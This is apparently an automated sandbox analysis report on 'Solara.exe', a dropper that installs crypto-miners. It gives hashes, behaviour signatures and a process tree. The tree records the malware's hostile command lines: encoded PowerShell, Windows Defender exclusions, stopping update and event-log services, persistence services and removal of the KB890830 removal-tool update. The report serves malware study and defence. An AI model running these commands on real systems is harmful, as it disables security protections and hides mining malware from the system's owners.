Analysis
max time kernel: 16s
max time network: 37s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 25/09/2024, 20:19
Static task: static1
Behavioral task: behavioral1
  Sample: Solara.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Solara.exe
  Resource: win10v2004-20240802-en
General
Target: Solara.exe
Size: 21.2MB
MD5: a6bf6970741f337bcb700166165c1f30
SHA1: f90ace8f03e2b76e243d539c8570d157f658d025
SHA256: 139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1
SHA512: c5ef34314bfbd5db99d8d02981e4ce5b46776bdae87e4768963fa902319a4d9712afe7bca302688a424eb9e7dffb9aa5da8444ea2877a48e3f9dd67622477521
SSDEEP: 393216:fOQxoHOKgCanLd/l/NmA6MierK6sl0Ibft5/TqcJb45EGle:2hOKgj/4MTrKV9ft5bqR5EGle
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 10 IoCs)
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
1736 | powershell.exe
2124 | powershell.exe
1856 | powershell.exe
1912 | powershell.exe
1460 | powershell.exe
1664 | powershell.exe
652 | powershell.exe
2404 | powershell.exe
2384 | powershell.exe
1572 | powershell.exe

Creates new service(s) (2 TTPs)

Executes dropped EXE (7 IoCs)
pid | Process
2212 | eth.exe
2896 | xmr.exe
2816 | Solara Bootstrapper.exe
2712 | kx new.exe
2236 | SolaraBootstrapper.exe
1052 | Kawpow new.exe
2596 | xmr new.exe

Loads dropped DLL (11 IoCs)
pid | Process
1620 | Solara.exe
1620 | Solara.exe
1620 | Solara.exe
1620 | Solara.exe
1620 | Solara.exe
2816 | Solara Bootstrapper.exe
2816 | Solara Bootstrapper.exe
2712 | kx new.exe
2712 | kx new.exe
2712 | kx new.exe
2712 | kx new.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
6 | raw.githubusercontent.com
7 | raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation (1 TTPs)
Adversaries may obfuscate content during command execution to impede detection.

Power Settings (1 TTPs, 8 IoCs)
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
2280 | powercfg.exe
1716 | powercfg.exe
1604 | powercfg.exe
2152 | powercfg.exe
1580 | powercfg.exe
1544 | powercfg.exe
2612 | powercfg.exe
1712 | powercfg.exe

Launches sc.exe (43 IoCs)
sc.exe is a Windows utility to control services on the system.
pid | Process
1084 | sc.exe
1748 | sc.exe
1468 | sc.exe
2352 | sc.exe
824 | sc.exe
340 | sc.exe
2892 | sc.exe
2136 | sc.exe
1292 | sc.exe
2324 | sc.exe
3012 | sc.exe
2144 | sc.exe
1348 | sc.exe
1348 | sc.exe
2904 | sc.exe
2372 | sc.exe
1912 | sc.exe
600 | sc.exe
1516 | sc.exe
2280 | sc.exe
2572 | sc.exe
2776 | sc.exe
1204 | sc.exe
1660 | sc.exe
2744 | sc.exe
2516 | sc.exe
2952 | sc.exe
2920 | sc.exe
1828 | sc.exe
1664 | sc.exe
1968 | sc.exe
2140 | sc.exe
472 | sc.exe
2076 | sc.exe
2144 | sc.exe
2400 | sc.exe
2692 | sc.exe
2644 | sc.exe
1348 | sc.exe
2136 | sc.exe
2336 | sc.exe
1356 | sc.exe
2520 | sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 7 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Solara Bootstrapper.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | kx new.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | SolaraBootstrapper.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Solara.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe

Suspicious behavior: EnumeratesProcesses (7 IoCs)
pid | Process
2872 | powershell.exe
2348 | powershell.exe
2984 | powershell.exe
2236 | SolaraBootstrapper.exe
2236 | SolaraBootstrapper.exe
2212 | eth.exe
2896 | xmr.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2872 | powershell.exe
Token: SeDebugPrivilege | 2348 | powershell.exe
Token: SeDebugPrivilege | 2984 | powershell.exe
Token: SeDebugPrivilege | 2236 | SolaraBootstrapper.exe

Suspicious use of WriteProcessMemory (40 IoCs)
description | pid | Process | procid_target
PID 1620 wrote to memory of 2348 | 1620 | Solara.exe | 30
PID 1620 wrote to memory of 2348 | 1620 | Solara.exe | 30
PID 1620 wrote to memory of 2348 | 1620 | Solara.exe | 30
PID 1620 wrote to memory of 2348 | 1620 | Solara.exe | 30
PID 1620 wrote to memory of 2212 | 1620 | Solara.exe | 32
PID 1620 wrote to memory of 2212 | 1620 | Solara.exe | 32
PID 1620 wrote to memory of 2212 | 1620 | Solara.exe | 32
PID 1620 wrote to memory of 2212 | 1620 | Solara.exe | 32
PID 1620 wrote to memory of 2896 | 1620 | Solara.exe | 33
PID 1620 wrote to memory of 2896 | 1620 | Solara.exe | 33
PID 1620 wrote to memory of 2896 | 1620 | Solara.exe | 33
PID 1620 wrote to memory of 2896 | 1620 | Solara.exe | 33
PID 1620 wrote to memory of 2816 | 1620 | Solara.exe | 34
PID 1620 wrote to memory of 2816 | 1620 | Solara.exe | 34
PID 1620 wrote to memory of 2816 | 1620 | Solara.exe | 34
PID 1620 wrote to memory of 2816 | 1620 | Solara.exe | 34
PID 2816 wrote to memory of 2872 | 2816 | Solara Bootstrapper.exe | 35
PID 2816 wrote to memory of 2872 | 2816 | Solara Bootstrapper.exe | 35
PID 2816 wrote to memory of 2872 | 2816 | Solara Bootstrapper.exe | 35
PID 2816 wrote to memory of 2872 | 2816 | Solara Bootstrapper.exe | 35
PID 2816 wrote to memory of 2712 | 2816 | Solara Bootstrapper.exe | 37
PID 2816 wrote to memory of 2712 | 2816 | Solara Bootstrapper.exe | 37
PID 2816 wrote to memory of 2712 | 2816 | Solara Bootstrapper.exe | 37
PID 2816 wrote to memory of 2712 | 2816 | Solara Bootstrapper.exe | 37
PID 2816 wrote to memory of 2236 | 2816 | Solara Bootstrapper.exe | 38
PID 2816 wrote to memory of 2236 | 2816 | Solara Bootstrapper.exe | 38
PID 2816 wrote to memory of 2236 | 2816 | Solara Bootstrapper.exe | 38
PID 2816 wrote to memory of 2236 | 2816 | Solara Bootstrapper.exe | 38
PID 2712 wrote to memory of 2984 | 2712 | kx new.exe | 40
PID 2712 wrote to memory of 2984 | 2712 | kx new.exe | 40
PID 2712 wrote to memory of 2984 | 2712 | kx new.exe | 40
PID 2712 wrote to memory of 2984 | 2712 | kx new.exe | 40
PID 2712 wrote to memory of 1052 | 2712 | kx new.exe | 42
PID 2712 wrote to memory of 1052 | 2712 | kx new.exe | 42
PID 2712 wrote to memory of 1052 | 2712 | kx new.exe | 42
PID 2712 wrote to memory of 1052 | 2712 | kx new.exe | 42
PID 2712 wrote to memory of 2596 | 2712 | kx new.exe | 43
PID 2712 wrote to memory of 2596 | 2712 | kx new.exe | 43
PID 2712 wrote to memory of 2596 | 2712 | kx new.exe | 43
PID 2712 wrote to memory of 2596 | 2712 | kx new.exe | 43
Processes
depth | image | command line | PID (signatures triggered by the process are listed beneath it)

1 | C:\Users\Admin\AppData\Local\Temp\Solara.exe | "C:\Users\Admin\AppData\Local\Temp\Solara.exe" | PID 1620
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  2 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA=" | PID 2348
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  2 | C:\Users\Admin\AppData\Local\Temp\eth.exe | "C:\Users\Admin\AppData\Local\Temp\eth.exe" | PID 2212
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    3 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 2384
      - Command and Scripting Interpreter: PowerShell
    3 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID 2004
      4 | C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID 1072
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID 2144
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID 2400
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID 2136
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID 1748
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID 1468
      - Launches sc.exe
    3 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 2440
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "ARIBLEUL" | PID 600
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto" | PID 2352
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | PID 2136
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "ARIBLEUL" | PID 1204
      - Launches sc.exe
  2 | C:\Users\Admin\AppData\Local\Temp\xmr.exe | "C:\Users\Admin\AppData\Local\Temp\xmr.exe" | PID 2896
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    3 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 1572
      - Command and Scripting Interpreter: PowerShell
    3 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID 1660
      4 | C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID 2224
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID 1664
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID 2336
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID 1968
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID 1348
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID 824
      - Launches sc.exe
    3 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 2972
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | PID 2516
      - Launches sc.exe
    3 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "ARIBLEUL" | PID 1356
      - Launches sc.exe
  2 | C:\Users\Admin\AppData\Local\Temp\Solara Bootstrapper.exe | "C:\Users\Admin\AppData\Local\Temp\Solara Bootstrapper.exe" | PID 2816
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    3 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=" | PID 2872
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    3 | C:\Users\Admin\AppData\Local\Temp\kx new.exe | "C:\Users\Admin\AppData\Local\Temp\kx new.exe" | PID 2712
      - Executes dropped EXE
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      4 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=" | PID 2984
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      4 | C:\Users\Admin\AppData\Local\Temp\Kawpow new.exe | "C:\Users\Admin\AppData\Local\Temp\Kawpow new.exe" | PID 1052
        - Executes dropped EXE
        5 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 1856
          - Command and Scripting Interpreter: PowerShell
        5 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID 2140
          6 | C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID 2844
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID 2372
          - Launches sc.exe
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID 1516
          - Launches sc.exe
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID 2572
          - Launches sc.exe
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID 1912
          - Launches sc.exe
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID 472
          - Launches sc.exe
        5 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | PID 2280
          - Power Settings
        5 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | PID 1712
          - Power Settings
        5 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | PID 2612
          - Power Settings
        5 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | PID 1544
          - Power Settings
        5 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 2940
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "CKTJZLMO" | PID 2076
          - Launches sc.exe
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" | PID 340
          - Launches sc.exe
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | PID 1828
          - Launches sc.exe
        5 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "CKTJZLMO" | PID 2776
          - Launches sc.exe
      4 | C:\Users\Admin\AppData\Local\Temp\xmr new.exe | "C:\Users\Admin\AppData\Local\Temp\xmr new.exe" | PID 2596
        - Executes dropped EXE
        5 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 1460
          - Command and Scripting Interpreter: PowerShell
    3 | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe" | PID 2236
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

1 | C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe | C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe | PID 2004
  2 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 1912
    - Command and Scripting Interpreter: PowerShell
  2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID 1688
    3 | C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID 1948
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID 1292
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID 1660
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID 2692
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID 2744
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID 1348
    - Launches sc.exe
  2 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 2060
  2 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 1728
    3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 1736
      - Command and Scripting Interpreter: PowerShell
    3 | C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe | "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" | PID 2932
    3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 652
      - Command and Scripting Interpreter: PowerShell
    3 | C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe | "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" | PID 2524
      4 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 2124
        - Command and Scripting Interpreter: PowerShell
      4 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID 1588
        5 | C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID 1872
      4 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID 3012
        - Launches sc.exe
      4 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID 1084
        - Launches sc.exe
      4 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID 2520
        - Launches sc.exe
  2 | C:\Windows\system32\dialer.exe | dialer.exe | PID 2808

1 | C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe | C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe | PID 1224
  2 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 1664
    - Command and Scripting Interpreter: PowerShell
  2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID 2492
    3 | C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID 824
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID 2904
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID 2952
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID 2140
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID 2920
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID 2644
    - Launches sc.exe
  2 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 1592
  2 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 600
  2 | C:\Windows\system32\dialer.exe | dialer.exe | PID 2184

1 | C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | PID 2640
  2 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID 2404
    - Command and Scripting Interpreter: PowerShell
  2 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID 2132
    3 | C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID 2560
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID 2144
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID 2324
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID 2892
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID 1348
    - Launches sc.exe
  2 | C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID 2280
    - Launches sc.exe
  2 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | PID 1580
    - Power Settings
  2 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | PID 2152
    - Power Settings
  2 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | PID 1604
    - Power Settings
  2 | C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | PID 1716
    - Power Settings
  2 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 1828
  2 | C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID 568
  2 | C:\Windows\system32\dialer.exe | dialer.exe | PID 2696
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- System Services (2)
  - Service Execution (2)
Defense Evasion
- Impair Defenses (1)
- Obfuscated Files or Information (1)
  - Command Obfuscation (1)
Downloads